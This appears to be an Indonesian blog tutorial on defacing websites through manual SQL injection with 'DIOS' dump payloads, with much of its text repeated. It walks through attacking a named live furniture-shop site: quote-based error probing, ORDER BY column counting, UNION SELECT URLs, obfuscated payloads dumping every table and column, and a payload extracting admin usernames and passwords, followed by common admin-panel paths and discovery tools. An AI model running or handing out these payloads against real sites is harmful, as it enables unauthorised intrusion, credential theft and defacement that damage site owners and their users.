CARA DEFACE SQL INJECTION MANUAL WITH DIOS
Bertemu lagi dengan sayaAssalamualaikum w.r w.b
Kali ini saya akan memberikan tutorial SQL Injection Manual
Oke.... disimak ya hehe
BAHAN
1.internet cuy yakali kaga pake internet
2.dork *kalian bisa cek dork disini > Dork SQL injection
3.web yg vuln sql injection
*disini saya ada live target :
http://rahmadewifurniture.com/media.php?module=detailproduk&id=460
yups langsung saja
- sekarang kita tambahkan '
jadinya seperti ini :http://rahmadewifurniture.com/media.php?module=detailproduk&id=460'
- yaps disini kita menemukan error atau ada gambar yg hilang.
*seperti ini:
- lalu kita disini melakukan perintah+order+by+1--+
- misal seperti ini :
- lakukan order by hingga menemukan error lagi seperti ini saya menemuka error di angka 16.
- berarti kita hanya ambil sampai 15 saja karena error nya di 16.
- selanjutnya kita melakukan perintah+union+select+ dan menambahkan [ - ] sebelum angka
- jadinya seperti ini :http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- yaps disini muncul angka togel ya itu 14 dan 3.
- agar tidak lama untuk mencari database table dan column kita menggunakan dios saja
- masukan dios ini
[/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/ ]
- yaps disini langsung keluar database table dan column nya.
- selanjutnya kita tinggal ambil user / password admin.
- dengan cara memasukan dios berikut
[(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x) ]
- bisa dibilang seperti ini :
http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admins)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4,5,6,7,8,9,10,11,12,13,14,15--+
*sesuaikan nama table dan colum nya ya..
- dan yaps sekarang kita sudah mendapatkan user dan password admin nya.
- tinggal kalian cari saja halaman admin nya biasanya di
* -/admin
-/administrator
-/login.php
-/admin.php
- jika belum ketemu juga kalian bisa download dirbuster atau memakai admin finder online. :)
Yups cukup sekian tutorial kali ini semoga bermanfaat.
See you on the next tutorial....
1.internet cuy yakali kaga pake internet
2.dork *kalian bisa cek dork disini > Dork SQL injection
3.web yg vuln sql injection
*disini saya ada live target :
http://rahmadewifurniture.com/media.php?module=detailproduk&id=460
yups langsung saja
- sekarang kita tambahkan '
jadinya seperti ini :http://rahmadewifurniture.com/media.php?module=detailproduk&id=460'
- yaps disini kita menemukan error atau ada gambar yg hilang.
*seperti ini:
- misal seperti ini :
- selanjutnya kita melakukan perintah+union+select+ dan menambahkan [ - ] sebelum angka
- jadinya seperti ini :http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- yaps disini muncul angka togel ya itu 14 dan 3.
- agar tidak lama untuk mencari database table dan column kita menggunakan dios saja
- masukan dios ini
[/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/ ]
- yaps disini langsung keluar database table dan column nya.
- dengan cara memasukan dios berikut
[(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x) ]
- bisa dibilang seperti ini :
http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admins)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4,5,6,7,8,9,10,11,12,13,14,15--+
*sesuaikan nama table dan colum nya ya..
- dan yaps sekarang kita sudah mendapatkan user dan password admin nya.
* -/admin
-/administrator
-/login.php
-/admin.php
- jika belum ketemu juga kalian bisa download dirbuster atau memakai admin finder online. :)
Yups cukup sekian tutorial kali ini semoga bermanfaat.
See you on the next tutorial....
0 Response to "CARA DEFACE SQL INJECTION MANUAL WITH DIOS"
Post a Comment